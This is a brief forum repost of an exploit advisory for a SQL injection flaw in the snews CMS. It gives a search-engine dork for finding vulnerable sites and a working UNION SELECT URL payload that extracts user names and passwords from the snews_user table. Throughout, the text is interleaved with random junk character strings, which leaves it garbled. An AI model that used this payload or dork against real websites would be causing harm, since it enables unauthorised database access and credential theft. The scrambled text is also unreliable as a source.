标题: CMS snews SQL Injection Vulnerability
( r* h% s, E1 z$ }' c D5 I l作者: By onestree7 w& T d+ h/ A. ^2 v
下载地址 : http://snewscms.com/
+ X) y- |- q; |3 q. F8 o测试平台 : ubuntu 12.10 / win 7
0 B$ k X, D' w关键词: inurl:"tanyakan pada rumput yang bergoyang"6 d+ \8 {7 c) q8 z) |0 N0 K" n- b
* a, [: w o9 W" ^: s8 q
1 ^+ W+ b4 @2 |+ u/ q! k
*************************************************************
! s4 m8 C& Y9 B, O' d
, f( ]$ a' R& R: a% r4 XSQL poc:2 C/ M9 u7 g! m' C
* k! F6 X2 [# R9 L0 B" Hhttp://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]8 r. G. s8 H& Z$ o
( S: o- v9 a" ~/ t示例
' L* l8 c& d6 P
+ J8 e( L6 q% r2 j6 q; Khttp://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*& W9 _/ ~, O& G. k- x i
: N" N+ B+ r2 m4 J% v7 ~
5 A3 K( ?1 S& K- U致谢:
5 \8 k" c! U5 f1 f( k9 v
: i# j% x7 B' A9 N8 c# v Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell; A1 k$ r3 p+ i6 k0 u) p
+ u; @, D J3 G- p+ i( a. B- S6 w indonesiancoder - moeslimh4x0r - go-coder
- @- S0 s- Y# A# r; P
/ G! n/ t- V9 @% g6 @spesial my hunny :*
7 j: ]* y; W8 F1 B* ` |
发表于 2013-1-23 08:55:06
收藏
支持
反对